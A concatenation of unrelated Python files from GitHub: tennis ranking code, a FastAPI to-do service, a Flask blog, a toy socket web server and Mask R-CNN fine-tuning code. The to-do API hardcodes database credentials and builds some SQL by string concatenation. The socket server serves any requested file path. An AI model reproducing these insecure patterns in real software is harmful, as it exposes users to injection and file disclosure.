players.\n \"\"\"\n if weeks == None or start_date == None:\n losers_dict = get_wbw_dict(matches, year = year)\n else:\n losers_dict = get_wbw_dict(matches, weeks = weeks, start_date = start_date)\n n_players = len(losers_dict)\n init_score = 1 / n_players\n\n # Now we add the initial score of the players, calculate the share of each,\n # and distribute their shares to the players to whom they have lost.\n for loser in losers_dict:\n if \"score\" not in losers_dict[loser]:\n losers_dict[loser][\"score\"] = 0\n\n try:\n losers_dict[loser][\"share\"] = (init_score /\n losers_dict[loser][\"n_losses\"])\n\n # If n_losses = 0, we handle the DivisionZeroError to avoid a function crash.\n except ZeroDivisionError:\n losers_dict[loser][\"score\"] += init_score\n\n # Players who lost at least once give the corresponding shares to other players:\n if losers_dict[loser][\"n_losses\"] != 0:\n # For each player who beat her\n for player in losers_dict[loser][\"lost_to\"]:\n if \"score\" not in losers_dict[player]:\n losers_dict[player][\"score\"] = 0\n # The player adds the loser\"s share * times the loser lost to the player\n losers_dict[player][\"score\"] += (losers_dict[loser][\"share\"] *\n losers_dict[loser][\"lost_to\"][player])\n\n # Finally, we rescale the score.\n for loser in losers_dict:\n losers_dict[loser][\"score\"] = ((losers_dict[loser][\"score\"] * 0.85) +\n (0.15 / n_players))\n\n # We repeat the previous procedure until there is minimum variation among the\n # scores of the players or a maximum level of iterations is reached.\n sd = np.inf\n n_iterations = 1\n while sd > epsilon and n_iterations < max_iterations:\n for loser in losers_dict:\n if \"new_score\" not in losers_dict[loser]:\n losers_dict[loser][\"new_score\"] = 0\n\n try:\n losers_dict[loser][\"share\"] = (losers_dict[loser][\"score\"] /\n losers_dict[loser][\"n_losses\"])\n except ZeroDivisionError:\n losers_dict[loser][\"new_score\"] += losers_dict[loser][\"score\"]\n\n # Players who lost at least once give the corresponding shares to other players:\n if losers_dict[loser][\"n_losses\"] != 0:\n for player in losers_dict[loser][\"lost_to\"]:\n if \"new_score\" not in losers_dict[player]:\n losers_dict[player][\"new_score\"] = 0\n losers_dict[player][\"new_score\"] += (losers_dict[loser][\"share\"] *\n losers_dict[loser][\"lost_to\"][player])\n\n # Finally, we rescale the score.\n # Here we calculate the standard deviation between\n # the previous and the current scores.\n sum_squared_differences_between_scores = 0\n ranking_dict = {}\n for loser in losers_dict:\n losers_dict[loser][\"new_score\"] = ((losers_dict[loser][\"new_score\"] * 0.85) +\n (0.15 / n_players))\n\n sum_squared_differences_between_scores += ((losers_dict[loser][\"new_score\"] -\n losers_dict[loser][\"score\"]) ** 2)\n\n # We fix the previous score for the following iteration.\n losers_dict[loser][\"score\"] = losers_dict[loser][\"new_score\"]\n losers_dict[loser][\"new_score\"] = 0\n\n # We populate the ranking_dict that we will use later for ordering in\n # case tihs is the last iteration. The value of each key is a list,\n # the second element will be the ranking position.\n ranking_dict[loser] = [losers_dict[loser][\"score\"]]\n\n sd = (sum_squared_differences_between_scores / n_players) ** (1 / 2)\n n_iterations += 1\n\n\n # We create a list for the printing procedure, and a dictionary if we want\n # to use it for comparing rankings. (It has a higher space complexity if we create both,\n # but a lower time complexity for future tasks).\n ranking = 0\n ranking_list = []\n for loser in sorted(ranking_dict, key = ranking_dict.get, reverse = True):\n ranking += 1\n ranking_list.append([loser, ranking_dict[loser][0], ranking])\n ranking_dict[loser].append(ranking)\n\n return ranking_list, ranking_dict\n\n\ndef print_top_n_ranking(matches, ranking_function, top_n_players, year = None,\n epsilon = 1e-10, max_iterations = 150):\n \"\"\"\n Assumes matches is a list of dictionaries where each match is a dictionary.\n Assumes n_players is an integer with the number of top players (from the beginning),\n according to the winners win ranking of a certain year, to print.\n Ranking_function can take three values:\n \"winners_win_ranking\", \"winners_dont_lose_ranking\" and \"wbw_ranking\".\n Epsilon and max_iterations are arguments predefined for the wbw_ranking function,\n lower epsilon and higher max_iterations are stronger criteria for convergence.\n For further details, please refer to the docstring of the wbw_ranking function.\n Prints the top n_players\n \"\"\"\n if ranking_function not in [winners_win_ranking,\n winners_dont_lose_ranking,\n wbw_ranking]:\n raise TypeError(\"A ranking function as specified in the docstring should be inputted.\")\n\n elif ranking_function == winners_win_ranking:\n for winner in ranking_function(matches, year)[:top_n_players]:\n if year != None:\n print(\"According to the winners win ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with\", winner[1], \"games won.\")\n else:\n print(\"According to the winners win ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in the period 2007-2021, with\", winner[1], \"games won.\")\n\n elif ranking_function == winners_dont_lose_ranking:\n for winner in ranking_function(matches, year)[:top_n_players]:\n if year != None:\n print(\"According to the winners don't lose ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with a score of\", str(winner[1]) + \".\")\n else:\n print(\"According to the winners don't lose ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in the period 2007-2021, with a score of\", str(winner[1]) + \".\")\n\n elif ranking_function == wbw_ranking:\n for winner in ranking_function(matches, year = year, epsilon = epsilon,\n max_iterations = max_iterations)[0][:top_n_players]:\n if year != None:\n print(\"According to the WbW ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in\", year, \"with a score of\", str(winner[1]) + \".\")\n else:\n print(\"According to the WbW ranking,\",\n winner[0], \"was the player ranked\", winner[2],\n \"in the period 2007-2021, with a score of\", str(winner[1]) + \".\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alberto-agudo/WTA_tennis_software","sub_path":"rankings.py","file_name":"rankings.py","file_ext":"py","file_size_in_byte":19598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29922385067","text":"\ndef ascending(txt):\n factors = lambda x: [f for f in range(1,x) if not x%f]\n for i in factors(len(txt)):\n nums = [int(txt[s:s+i]) for s in range(0,len(txt),i)]\n print(sum(range(1,len(nums))))\n if sum(range(1,len(nums)))==(sum(nums) - (nums[0]*len(nums))):\n return True\n print(nums)\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"9iLhKgqZn5exBrmWm_12.py","file_name":"9iLhKgqZn5exBrmWm_12.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2306202252","text":"from setuptools import setup, find_packages\n\nimport quango.version\n\nscripts = ['bin/quango']\n\nsetup(\n name = 'quango',\n version = quango.version.get_version(),\n license = 'GPL',\n author = 'Georg Brandl',\n author_email = 'g.brandl@fz-juelich.de',\n description = 'Nice generic user interface for Tango devices',\n packages = find_packages(),\n package_data = {'quango': ['RELEASE-VERSION']},\n scripts = scripts,\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'Natural Language :: English',\n 'License :: OSI Approved :: GPL License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Scientific/Engineering :: Physics',\n ],\n)\n","repo_name":"alenz33/quango","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37269455637","text":"from fastapi import FastAPI\nfrom fastapi.responses import JSONResponse\nimport pyodbc\nimport json\nfrom typing import List\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\n\napp = FastAPI()\n\norigins = [\n \"*\"\n]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\nclass INotes(BaseModel):\n id: int\n noteName: str\n todos: list\n dateCreated: str\n lastUpdated: str\n openList: bool = True\n\n\ncnn = pyodbc.connect(\n 'DRIVER = {SQL Server};DSN=DSQL;SERVER=DESKTOP-TS5ILJ2\\\\SQLEXPRESS;DATABASE=Todolist;UID=dorJob;PWD=1234;')\ncursor = cnn.cursor()\n\n\n@app.get(\"/note\")\ndef ReadData():\n jsonFinished = []\n jsonFile = {}\n todosList = []\n notesList = []\n cursor.execute('SELECT id FROM Todolist.dbo.INotes')\n for rows in cursor:\n notesList.append(rows)\n for note in notesList:\n cursor.execute(\n 'SELECT * FROM Todolist.dbo.ITodo WHERE todoId=any(SELECT idTodo FROM Todolist.dbo.NoteTodo where idNote=' + str(note.id) + ')')\n for row in cursor:\n todo = {}\n if (row.completed == 1):\n flag = True\n else:\n flag = False\n todo = {\n \"todoId\": int(row.todoId),\n \"title\": str(row.title),\n \"completed\": bool(flag)}\n todosList.append(todo)\n cursor.execute(\n 'SELECT * FROM Todolist.dbo.INotes WHERE id = ?', str(note.id))\n nt = cursor.fetchone()\n if (nt.openList == 1):\n flag = True\n else:\n flag = False\n jsonFile = {\n \"id\": int(nt.id),\n \"noteName\": str(nt.noteName),\n \"todos\": todosList,\n \"dateCreated\": nt.dateCreated,\n \"lastUpdated\": nt.lastUpdated,\n \"openList\": bool(flag)}\n jsonFinished.append(jsonFile)\n todosList = []\n ToServer = json.dumps(jsonFinished)\n return JSONResponse(content=ToServer)\n\n\n@app.post(\"/note\")\nasync def create_Note(note: INotes):\n cursor.execute(\n \"INSERT INTO Todolist.dbo.INotes( noteName, dateCreated, lastUpdated, openList) VALUES (?,?,?,?)\", note.noteName, note.dateCreated, note.lastUpdated, note.openList)\n cnn.commit()\n\n\n@app.delete(\"/note/{id}\")\nasync def DeleteNoteFromDataBase(id: int):\n print(\"dcdc\")\n cursor.execute(\n \"SELECT idTodo FROM Todolist.dbo.NoteTodo WHERE idNote =?\", id)\n todoIds = cursor.fetchall()\n cursor.execute(\n \"DELETE FROM Todolist.dbo.NoteTodo WHERE idNote=?\", id)\n cnn.commit()\n for x in todoIds:\n cursor.execute(\n \"DELETE FROM Todolist.dbo.ITodo WHERE todoId=?\", x.idTodo)\n cnn.commit()\n cursor.execute(\"DELETE FROM Todolist.dbo.INotes WHERE id=?\", id)\n cnn.commit()\n print(cursor)\n\n\n@app.post(\"/note/addNote\")\nasync def updateDataBase(note: INotes):\n print(\"updateDataBase\")\n todos = note.todos\n cursor.execute(\n \"INSERT INTO Todolist.dbo.ITodo(title,completed) VALUES (?,?)\", todos[-1][\"title\"], todos[-1][\"completed\"])\n cnn.commit()\n cursor.execute(\n \"SELECT Max(todoId) FROM Todolist.dbo.ITodo\")\n max_id = cursor.fetchone()[0]\n print(max_id)\n print(note.id)\n cursor.execute(\n \"INSERT INTO Todolist.dbo.NoteTodo(idNote,idTodo) VALUES (?,?)\", note.id, max_id)\n cnn.commit()\n\n\n@app.post(\"/note/update\")\nasync def updateComp(note: INotes):\n print('INSIDE updateComp')\n todos = note.todos\n if (todos[-1][\"completed\"]):\n flag = 0\n else:\n flag = 1\n cursor.execute(\"UPDATE Todolist.dbo.ITodo SET completed =\" +\n str(flag) + \" WHERE todoId = \" + str(todos[-1][\"todoId\"]))\n cnn.commit()\n\n\n@app.post(\"/note/updateNote\")\nasync def updateOpenList(note: INotes):\n if (note.openList):\n flag = 0\n else:\n flag = 1\n cursor.execute(\"UPDATE Todolist.dbo.INotes SET openList =\" +\n str(flag)+\" WHERE id = \"+str(note.id))\n cnn.commit()\n","repo_name":"dorhaba/Todolist_pyhton","sub_path":"Todolist/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21589214296","text":"from flask import Flask, render_template, request\nimport requests\nimport smtplib\nfrom datetime import date\n\nnpoint_url = 'https://api.npoint.io/a695600da11dfa61ec4f'\nOWN_EMAIL = 'YOUR EMAIL'\nOWN_PASSWORD = 'YOUR PASSWORD'\nposts = requests.get(npoint_url).json()\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/index.html')\ndef get_all_posts():\n \"\"\"Landing Page.\"\"\"\n return render_template('index.html', all_posts=posts, year=year, month=month)\n\n\n@app.route('/post/')\ndef show_post(index):\n requested_post = None\n for blog_post in posts:\n if blog_post['id'] == index:\n requested_post = blog_post\n return render_template('post.html', post=requested_post, year=year)\n\n\n@app.route('/about')\ndef about():\n \"\"\"About Page.\"\"\"\n return render_template('about.html', year=year)\n\n\n@app.route('/contact', methods=['GET', 'POST'])\ndef contact():\n \"\"\"Contact Page.\"\"\"\n if request.method == 'POST':\n data = request.form\n send_email(data[\"name\"], data[\"email\"], data[\"phone\"], data[\"message\"])\n return render_template('contact.html', year=year, msg_sent=True)\n return render_template('contact.html', year=year, msg_sent=False)\n\n\n@app.route('/post')\ndef post():\n \"\"\"Post Page\"\"\"\n return render_template('post.html')\n\n\ndef send_email(name, email, phone, message):\n # if you get UnicodeEncodeError\n # try {message}\".encode(\"utf-8\")\n email_message = f\"Subject:New Message\\n\\nName: {name}\\nEmail: {email}\\nPhone: {phone}\\nMessage:{message}\"\n with smtplib.SMTP('smtp.gmail.com') as connection:\n connection.starttls()\n connection.login(OWN_EMAIL, OWN_PASSWORD)\n connection.sendmail(OWN_EMAIL, OWN_EMAIL, email_message)\n\n\nif __name__ == '__main__':\n today = date.today()\n year = today.year\n month = today.month\n app.run(debug=True)\n","repo_name":"ChaosFreeze/upgraded-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38074782458","text":"from __future__ import annotations\nfrom src.helpers.selectors.dict_selector import DictSelector\nfrom src.facades.config.config_reader import ConfigReader\nfrom src.generators.image_generator import ImageGenerator\nfrom src.generators.sound_generator import SoundGenerator\nfrom src.generators.number_generator import NumberGenerator\nfrom src.generators.clip_generator import ClipGenerator\nfrom libs.python_library.argument_parser import ArgumentParser\n\n\nclass AppDelegator:\n def __init__(self) -> None:\n pass\n\n def apply_config(self) -> AppDelegator:\n for key, value in ConfigReader.read().items():\n setattr(self, f'_{key}', value)\n print('[%s]: %s' % (key, value))\n self._img_config = ConfigReader.read(path=self._img_config_path)\n self._sound_config = ConfigReader.read(path=self._sound_config_path)\n return self\n \n def apply_arguments(self) -> AppDelegator:\n for key, value in ArgumentParser.get_pairs(remove_prefix=True).items():\n setattr(self, f'_{key}', int(value))\n print('[%s]: %s' % (key, value))\n return self\n\n def generate_pairs(self) -> AppDelegator:\n print('In generate_pairs')\n self.imgs = {}\n while(len(self.imgs) < self._img_cnt):\n self.imgs[NumberGenerator(\n config=self._img_config,\n folder=self._img_folder,\n basis=self._max_imgs,\n file_type=self._img_type\n ).generate().condition_correcting().output()] = len(self.imgs)\n print('going for sound')\n self.sounds = {}\n while(len(self.sounds) < self._img_cnt):\n self.sounds[NumberGenerator(\n config=self._sound_config,\n folder=self._sound_folder,\n basis=self._max_imgs,\n file_type=self._sound_type\n ).generate().condition_correcting().output()] = len(self.sounds)\n return self\n\n def generate_pictures(self) -> AppDelegator:\n print('In generate_pictures')\n for img_code, index in self.imgs.items():\n print(f'image #{index} = {img_code}')\n ImageGenerator(\n config=self._img_config,\n folder=self._img_folder,\n basis=self._max_imgs,\n file_type=self._img_type\n ) \\\n .decode(img_code) \\\n .generate() \\\n .save(path=self._output_path['imgs'])\n print(f'done for image #{index}')\n return self\n\n def generate_sounds(self) -> AppDelegator:\n print('In generate_sounds')\n for sound_code, index in self.sounds.items():\n print(f'sound #{index} = {sound_code}')\n SoundGenerator(\n config=self._sound_config,\n folder=self._sound_folder,\n basis=self._max_imgs,\n file_type=self._sound_type\n ) \\\n .decode(sound_code) \\\n .generate() \\\n .mastering() \\\n .save(path=self._output_path['sounds'])\n print(f'done music for #{index}')\n return self\n \n def mix(self) -> AppDelegator:\n for i in range(self._img_cnt):\n ClipGenerator(\n sound_id=DictSelector.get_by_value(self.sounds, i)[0],\n img_id=DictSelector.get_by_value(self.imgs, i)[0]\n ) \\\n .load_img(path=self._output_path['imgs'], file_type=self._img_type) \\\n .load_sound(path=self._output_path['sounds'], file_type=self._sound_type) \\\n .generate() \\\n .save(path=self._output_path['mp4s'])\n return self\n","repo_name":"shamir0xe/xellu","sub_path":"src/delegators/app_delegator.py","file_name":"app_delegator.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73640633050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#########################################################################\n# Author: Zhaoting Weng\n# Created Time: Sun 18 Oct 2015 06:39:23 PM CST\n# File Name: systemd_filter.py\n# Description:\n#########################################################################\n\nimport argparse\nimport sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom lib.dot_filter import dot_filter\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"input\")\nparser.add_argument(\"--from-node\", dest=\"fromNode\", default=\"\", help='From which node to extract(regexp supported)')\nparser.add_argument(\"--to-node\", dest=\"toNode\", default=\"\", help='To which node to extract(regexp supported)')\nparser.add_argument(\"--filter\", dest=\"filter\", nargs=\"*\", choices=[\"conflicts\", \"after\", \"wants\", \"requires\", \"requisite\"], help='Which kind of transitions do you want to view')\nparser.add_argument(\"--output\", \"-o\", dest=\"output\", default=\"./output.dot\", help='Output filtered dot file')\nArgs = parser.parse_args()\n\ndot = dot_filter(\"systemd\")\ndot.filt(Args.input, Args.fromNode, Args.toNode, Args.filter, Args.output)\n\n","repo_name":"magodo/DotFilter","sub_path":"bin/systemd_filter.py","file_name":"systemd_filter.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36942297933","text":"from django.conf import settings\nimport http.client,requests,random\n\n\ndef phone_otp(phone_number,otp):\n try:\n url = f'https://2factor.in/API/V1/e2496452-1a3b-11ee-addf-0200cd936042/SMS/+91{phone_number}/{otp}/OTP1'\n response = requests.get(url)\n \n except Exception as e:\n return None","repo_name":"deepak982/Like-Dislike","sub_path":"mainapp/otp.py","file_name":"otp.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71007050013","text":"# import socket module\nfrom socket import *\nimport datetime\n\nserverSocket = socket(AF_INET, SOCK_STREAM)\n# Prepare a sever socket\naddress = ('', 6789)\nserverSocket.bind(address)\nserverSocket.listen(5)\n\nwhile True:\n # Establish the connection6\n print('Ready to serve...')\n connectionSocket, addr = serverSocket.accept()\n print('addr:', addr)\n try:\n message = connectionSocket.recv(1024).decode()\n print('message:', message)\n filename = message.split()[1]\n f = open(filename[1:])\n output_data = f.read()\n # print('output_data:', output_data)\n # Send one HTTP header line into socket\n now = datetime.datetime.now()\n first_header = \"HTTP/1.1 200 OK\"\n header_info = {\n \"Date\": now.strftime(\"%Y-%m-%d %H:%M\"),\n \"Content-Length\": len(output_data),\n \"Keep-Alive\": \"timeout=%d,max=%d\" % (10, 100),\n \"Connection\": \"Keep-Alive\",\n \"Content-Type\": \"text/html\"\n }\n following_header = \"\\r\\n\".join(\"%s:%s\" % (item, header_info[item])\n for item in header_info)\n # print(\"following_header:\", following_header)\n connectionSocket.send(\"%s\\r\\n%s\\r\\n\\r\\n\".encode() % (first_header.encode(),\n following_header.encode()))\n # Send the content of the requested file to the client\n for i in range(0, len(output_data)):\n connectionSocket.send(output_data[i].encode())\n connectionSocket.send(\"\\r\\n\".encode())\n\n connectionSocket.close()\n except IOError:\n # Send response message for file not found\n # Close client socket\n connectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\nContent-Type: \"\n \"text/html\\r\\n\\r\\n

404 Not \"\n \"Found

\".encode())\n connectionSocket.close()\n\nserverSocket.close()\n# sys.exit() # Terminate the program after sending the corresponding data\n","repo_name":"Index-Out-Of-Range/ComputerNet","sub_path":"dp1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12970804000","text":"# coding:utf-8\nimport json\nimport requests\n\n\ndef new_req(url, text, title,):\n data = {'msgtype': 'markdown',\n 'markdown': {\n 'text': text,\n 'title': title,\n # 'messageUrl': messageurl\n }}\n data = json.dumps(data).encode(encoding='UTF8')\n print(data)\n head = {\"Content-Type\": \"application/json\"}\n response = requests.post(url, data=data, headers=head).json\n print(response)\n\n\n# 钉钉机器人链接\n# url = \"https://oapi.dingtalk.com/robot/send?access_token=4c3fe1a2d54d0c51c8d6867c6104cc0e095113f48667e15012b8545043942b49\"\n# waring_text = \"### 请查看接口测试报告\"\n# new_req(url, waring_text, \"接口预警\")\n","repo_name":"willcyc/test_coding","sub_path":"test_coding/common_file/sendDD.py","file_name":"sendDD.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20711289753","text":"import torch\nfrom maskrcnn_benchmark.modeling.utils import cat\nimport numpy as np\nfrom torch import nn\n\nimport argparse\nimport os\nimport time\nimport datetime\nimport pickle\n\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.data.build import make_data_sampler, make_batch_data_sampler\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir, save_config\nfrom maskrcnn_benchmark.utils.logger import setup_logger, debug_print\nfrom maskrcnn_benchmark.utils.comm import synchronize, get_rank, all_gather, is_main_process\nfrom maskrcnn_benchmark.solver import make_optimizer\nfrom maskrcnn_benchmark.solver import make_lr_scheduler\nfrom maskrcnn_benchmark.utils.metric_logger import MetricLogger\nfrom maskrcnn_benchmark.utils.checkpoint import clip_grad_norm\nfrom maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer\nfrom maskrcnn_benchmark.modeling.detector import build_detection_model\nfrom maskrcnn_benchmark.modeling.roi_heads.relation_head.utils_relation import layer_init\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.HTCL.htcl_feats_dataset import HTCL_Feats_Dataset\nfrom maskrcnn_benchmark.engine.trainer import reduce_loss_dict\nfrom maskrcnn_benchmark.solver.lr_scheduler import WarmupMultiStepLR, WarmupReduceLROnPlateau\n# See if we can use apex.DistributedDataParallel instead of the torch default,\n# and enable mixed-precision via apex.amp\n# try:\n# from apex import amp\n# except ImportError:\n# raise ImportError('Use APEX for multi-precision via apex.amp')\n\n\nclass Classifier(nn.Module):\n def __init__(self, config):\n super(Classifier, self).__init__()\n self.num_rel_cls = config.MODEL.ROI_RELATION_HEAD.NUM_CLASSES\n self.LAST_FEATS_DIM = config.MODEL.ROI_RELATION_HEAD.LAST_FEATS_DIM\n self.cfg = config\n self.sigmoid = nn.Sigmoid()\n self.fine_cls = nn.Linear(self.LAST_FEATS_DIM, self.num_rel_cls)\n layer_init(self.fine_cls, xavier=True)\n\n def forward(self, feats, rel_dist0=None, logit_wt=None):\n if self.cfg.MODEL.ft_with_dist0:\n refine_dist = self.fine_cls(feats)\n refine_dist = (refine_dist - refine_dist.mean(dim=1).reshape(-1, 1)) / refine_dist.std(dim=1).reshape(-1, 1)\n rel_dist = rel_dist0 * self.sigmoid(logit_wt) + refine_dist * (1 - self.sigmoid(logit_wt))\n return rel_dist\n else:\n refine_dist = self.fine_cls(feats)\n refine_dist = (refine_dist - refine_dist.mean(dim=1).reshape(-1, 1)) / refine_dist.std(dim=1).reshape(-1, 1)\n return refine_dist\n\n\ndef make_classifier_data_loader(cfg, dataset=None, batch_size=None, shuffle=True, start_iter=0, is_distributed=False):\n images_per_gpu = batch_size\n num_iters = cfg.SOLVER.Classifier_max_iter\n sampler = make_data_sampler(dataset, shuffle, is_distributed)\n batch_sampler = make_batch_data_sampler(\n dataset, sampler, False, images_per_gpu, num_iters, start_iter\n )\n\n num_workers = cfg.DATALOADER.NUM_WORKERS\n data_loader = torch.utils.data.DataLoader(\n dataset,\n num_workers=num_workers,\n batch_sampler=batch_sampler,\n )\n return data_loader\n\n\ndef sgg_model_load_parameterss(model, classifier, distributed):\n if distributed:\n classifier = classifier.module\n with torch.no_grad():\n model.roi_heads.relation.predictor.fine_cls.weight.copy_(classifier.fine_cls.weight, non_blocking=True)\n model.roi_heads.relation.predictor.fine_cls.bias.copy_(classifier.fine_cls.bias, non_blocking=True)\n return model\n\n\ndef fix_eval_modules(eval_modules):\n for module in eval_modules:\n for _, param in module.named_parameters():\n param.requires_grad = False\n\n\ndef run_val(cfg, model, val_data_loaders, distributed, logger):\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n if cfg.MODEL.KEYPOINT_ON:\n iou_types = iou_types + (\"keypoints\",)\n if cfg.MODEL.RELATION_ON:\n iou_types = iou_types + (\"relations\",)\n if cfg.MODEL.ATTRIBUTE_ON:\n iou_types = iou_types + (\"attributes\",)\n\n\n dataset_names = cfg.DATASETS.VAL\n val_result = []\n for dataset_name, val_data_loader in zip(dataset_names, val_data_loaders):\n dataset_result = inference(\n cfg,\n model,\n val_data_loader,\n dataset_name=dataset_name,\n iou_types=iou_types,\n box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=None,\n logger=logger,\n )\n synchronize()\n val_result.append(dataset_result)\n # support for multi gpu distributed testing\n gathered_result = all_gather(torch.tensor(dataset_result).cpu())\n gathered_result = [t.view(-1) for t in gathered_result]\n gathered_result = torch.cat(gathered_result, dim=-1).view(-1)\n valid_result = gathered_result[gathered_result >= 0]\n val_result = float(valid_result.mean())\n del gathered_result, valid_result\n # torch.cuda.empty_cache()\n return val_result\n\n\ndef run_test(cfg, model, distributed, logger):\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n if cfg.MODEL.KEYPOINT_ON:\n iou_types = iou_types + (\"keypoints\",)\n if cfg.MODEL.RELATION_ON:\n iou_types = iou_types + (\"relations\",)\n if cfg.MODEL.ATTRIBUTE_ON:\n iou_types = iou_types + (\"attributes\",)\n output_folders = [None] * len(cfg.DATASETS.TEST)\n\n dataset_names = cfg.DATASETS.TEST\n if cfg.CLASSIFIER_OUTPUT_DIR:\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.CLASSIFIER_OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n data_loaders_val = make_data_loader(cfg, mode='test', is_distributed=distributed)\n for output_folder, dataset_name, data_loader_val in zip(output_folders, dataset_names, data_loaders_val):\n inference(\n cfg,\n model,\n data_loader_val,\n dataset_name=dataset_name,\n iou_types=iou_types,\n box_only=False if cfg.MODEL.RETINANET_ON else cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=output_folder,\n logger=logger,\n )\n synchronize()\n\n\n\ndef htcl_classifier_ft(cfg, local_rank, distributed, logger):\n debug_print(logger, 'prepare training')\n classifier = Classifier(cfg)\n debug_print(logger, 'end model construction')\n device = torch.device(cfg.MODEL.DEVICE)\n classifier.to(device)\n\n num_batch = cfg.SOLVER.Classifier_batch\n cls_optimizer = make_optimizer(cfg, classifier, logger, slow_heads=[], slow_ratio=10.0,\n rl_factor=float(num_batch))\n scheduler = WarmupMultiStepLR(cls_optimizer, cfg.SOLVER.cls_ft_STEPS, 0.1, warmup_factor=0.01, warmup_iters=2000)\n debug_print(logger, 'end optimizer and shcedule')\n\n # Initialize mixed-precision training\n # use_mixed_precision = cfg.DTYPE == \"float16\"\n # amp_opt_level = 'O1' if use_mixed_precision else 'O0'\n # classifier, cls_optimizer = amp.initialize(classifier, cls_optimizer, opt_level= amp_opt_level,verbosity=0)\n\n if distributed:\n classifier = torch.nn.parallel.DistributedDataParallel(\n classifier, device_ids=[local_rank], output_device=local_rank,\n # this should be removed if we update BatchNorm stats\n broadcast_buffers=False,\n find_unused_parameters=True,\n )\n debug_print(logger, 'end distributed')\n\n arguments = {}\n arguments[\"iteration\"] = 0\n arguments[\"last_val_results\"] = 0\n arguments[\"best_val_results\"] = 0\n\n output_dir = cfg.CLASSIFIER_OUTPUT_DIR\n save_to_disk = get_rank() == 0\n\n checkpointer = DetectronCheckpointer(cfg, classifier, cls_optimizer,scheduler, save_dir= output_dir, save_to_disk= save_to_disk,logger=logger, custom_scheduler=True)\n\n if checkpointer.has_checkpoint():\n extra_checkpoint_data = checkpointer.load()\n arguments.update(extra_checkpoint_data)\n else:\n load_mapping = {\"fine_cls\": \"roi_heads.relation.predictor.fine_cls\"}\n checkpointer.load(cfg.MODEL.Feature_Generation_MODEL, with_optim=False, load_mapping=load_mapping)\n\n sgg_model = build_detection_model(cfg)\n eval_modules = (sgg_model.rpn, sgg_model.backbone, sgg_model.roi_heads,)\n fix_eval_modules(eval_modules)\n sgg_model.to(device)\n\n # use_mixed_precision = cfg.DTYPE == \"float16\"\n # amp_opt_level = 'O1' if use_mixed_precision else 'O0'\n # sgg_model = amp.initialize(sgg_model, opt_level=amp_opt_level)\n\n checkpointer_sgg = DetectronCheckpointer(cfg, sgg_model, logger=logger)\n checkpointer_sgg.load(cfg.MODEL.Feature_Generation_MODEL, with_optim=False)\n\n sgg_model = sgg_model_load_parameterss(sgg_model, classifier, distributed)\n\n 